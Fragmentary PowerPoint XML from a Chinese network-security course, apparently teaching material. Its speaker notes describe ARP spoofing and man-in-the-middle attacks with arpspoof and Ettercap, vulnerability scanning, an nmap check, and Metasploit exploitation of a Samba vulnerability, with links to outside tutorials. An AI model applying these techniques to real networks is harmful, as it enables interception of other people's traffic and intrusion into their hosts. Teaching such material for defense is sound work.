              <a:t>通过查看地址信息，可以确定攻击主机与目标主机没有进行过任何通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保证彼此不通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对目标主机进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击。攻击主机向目标主机发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答包，告诉目标主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址（欺骗为自己的）。实际不是。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ctrl+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>退出后，会重复出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>条，此时为各自真实的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无法安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具时通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>apt-get update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行更新</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出结果：攻击主机向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答包，告诉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址为攻击主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击主机向网关地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答包，告诉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网关的目标主机地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为攻击主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2774034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界面显示了扫描到的所有主机及主机的漏洞信息。从显示的结果可以看到，扫描的主机数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，漏洞数位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>52</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，扫描历史次数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Vulunerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>列可以看到，以不同颜色显示了不同级别的漏洞及个数。用户将鼠标悬浮到每个颜色上面，还可以看到该漏洞所占的百分比，在右下角以圆形显示了每种漏洞所占的比例，而且在圆形图右侧显示了每种颜色代表的漏洞安全级别。</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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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41740108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该界面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>工具的初始界面。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示双向；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>oneway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示单向 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主要用于进行中间人攻击，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>则主要用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05073B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25110114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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>指定监听的接口</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有防火墙的话则可能截不到数据包 </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https://blog.csdn.net/qq_46804551/article/details/116265217</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31357470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注意开启路由转发，攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows XP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统成功率高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>支持图形化操作和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC5531"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>命令行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31683394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https://www.cnblogs.com/root-123/p/16566122.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>绿色加号代表存在这个漏洞，然后使用攻击工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>先扫描远程桌面服务有没有关闭，后攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://blog.csdn.net/weixin_66469999/article/details/127752624</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1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用Metaploit进行Linux远程渗透攻击——利用Samba服务漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>先nmap -sT是否开启服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://blog.csdn.net/weixin_61427044/article/details/126896351</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://www.cnblogs.com/zzxb/p/12732988.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://cloud.tencent.com/developer/article/1079631?ivk_sa=1024320u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3329952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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="12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2177012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E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326775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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1454303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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="936625"/>
            <a:ext cx="12204700" cy="71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>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sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278938" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="936625"/>
            <a:ext cx="12204700" cy="71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>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sz="2100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278937" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06756711-9B64-156F-2438-836011307BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1041037" y="235589"/>
            <a:ext cx="14709839" cy="707872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91428" tIns="45713" rIns="91428" bIns="45713">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00FF"/>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漏洞利用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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 name="出自【趣你的PPT】(微信:qunideppt)：最优质的PPT资源库">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D6345C-782E-4C06-0932-9030D676D769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="353962" y="189923"/>
            <a:ext cx="687076" cy="70787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1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
